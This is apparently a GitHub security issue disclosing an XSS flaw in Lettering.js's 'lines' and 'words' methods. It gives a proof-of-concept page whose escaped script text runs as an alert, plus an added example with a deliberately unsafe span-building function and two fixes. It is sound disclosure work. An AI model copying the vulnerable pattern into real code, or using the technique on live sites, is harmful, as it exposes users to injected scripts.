
Security issue: XSS for methods 'lines' and 'words'

Open pcworld opened this issue 5 years ago • 0 comments

The injector first extracts the DOM text representation, then inserts it into HTML: https://github.com/davatron5000/Lettering.js/blob/d06bb733823a6fa76e11a09d24849d066a1566aa/jquery.lettering.js#L20

Thus, even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing cross-site scripting (XSS). This is probably only exploitable in the `lines` and `words` methods, because the default method splits into characters, and the `<` in `<span><</span>` is parsed as text by browsers.

Solution

Create the `<span>` programmatically using `document.createElement` and set the content using `textContent`.

Exploit

```html
<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<!-- Server-side escaped content: on its own this renders as literal text and is harmless. -->
<div id="exploitme">&lt;script&gt;alert(&quot;I'm properly escaped HTML&quot;);&lt;/script&gt;</div>
<script>
// 'lines' reads the div's text (entities already decoded) and re-inserts it as HTML.
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>
```

A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.

pcworld · Apr 19 '20 22:04
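As an added example (not code from Lettering.js or from the issue author), the following contrasts the unsafe pattern the issue describes with the proposed repair. `buildSpansUnsafe` is modelled on the description of the injector (read the element's text, rebuild markup from it by string concatenation), not copied from the library; `buildSpansEscaped` shows the minimal fix if string building must stay, and `letteringSafe` is the `createElement` / `textContent` approach the issue recommends. All function names, the `DECODED_TEXT` sample and the `hasUnexpectedTag` heuristic are this example's own assumptions.

```javascript
// Added example, not Lettering.js or the reporter's code. Models the unsafe
// text-to-HTML round trip described in the issue and two ways to repair it.

// What jQuery's .text() / DOM textContent returns for the issue's
// `&lt;script&gt;...` div: the entities are already decoded. Constructed sample.
const DECODED_TEXT = '<script>alert("I\'m properly escaped HTML");</script>';

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Vulnerable (modelled on the issue's description of the injector): each
// fragment of decoded text is spliced raw into markup, so whatever the
// server escaped comes back out as live HTML.
function buildSpansUnsafe(text, splitter, klass) {
  return text.split(splitter)
    .map((item, i) => '<span class="' + klass + (i + 1) + '" aria-hidden="true">' + item + '</span>')
    .join('');
}

// Minimal repair when the HTML string must stay: re-escape every fragment,
// and the caller-supplied class name, before concatenation.
function buildSpansEscaped(text, splitter, klass) {
  return text.split(splitter)
    .map((item, i) =>
      '<span class="' + escapeHtml(klass + (i + 1)) + '" aria-hidden="true">' + escapeHtml(item) + '</span>')
    .join('');
}

// The fix the issue proposes: never go through an HTML string at all.
// Spans are created with createElement and filled via textContent, so a
// fragment can only ever become a text node. `el` is any DOM element.
// Returns the number of spans inserted.
function letteringSafe(el, splitter, klass) {
  const doc = el.ownerDocument;
  const text = el.textContent;
  el.setAttribute('aria-label', text);
  while (el.firstChild) el.removeChild(el.firstChild);
  text.split(splitter).forEach((item, i) => {
    const span = doc.createElement('span');
    span.className = klass + (i + 1);
    span.setAttribute('aria-hidden', 'true');
    span.textContent = item;
    el.appendChild(span);
  });
  return el.childNodes.length;
}

// Crude heuristic (not an HTML parser): does a generated string open any
// tag other than the <span> wrappers we meant to emit? A "<" followed by a
// non-letter, as in the per-character split, is text, not a tag.
function hasUnexpectedTag(html) {
  return /<(?!\/?span\b)[a-zA-Z]/.test(html);
}

// Browser entry point: apply the safe version to the issue's #exploitme div.
if (typeof document !== 'undefined') {
  const el = document.getElementById('exploitme');
  if (el) letteringSafe(el, '\n', 'line');
}
```

Run in Node, `buildSpansUnsafe(DECODED_TEXT, '\n', 'line')` yields markup containing a live `<script>` element, while splitting the same text per character does not, which matches the issue's observation about the default method; `buildSpansEscaped` and `letteringSafe` produce no unexpected tags regardless of the splitter. `hasUnexpectedTag` is only a sanity check for the example; rely on the DOM approach, not on a regex, for the actual fix.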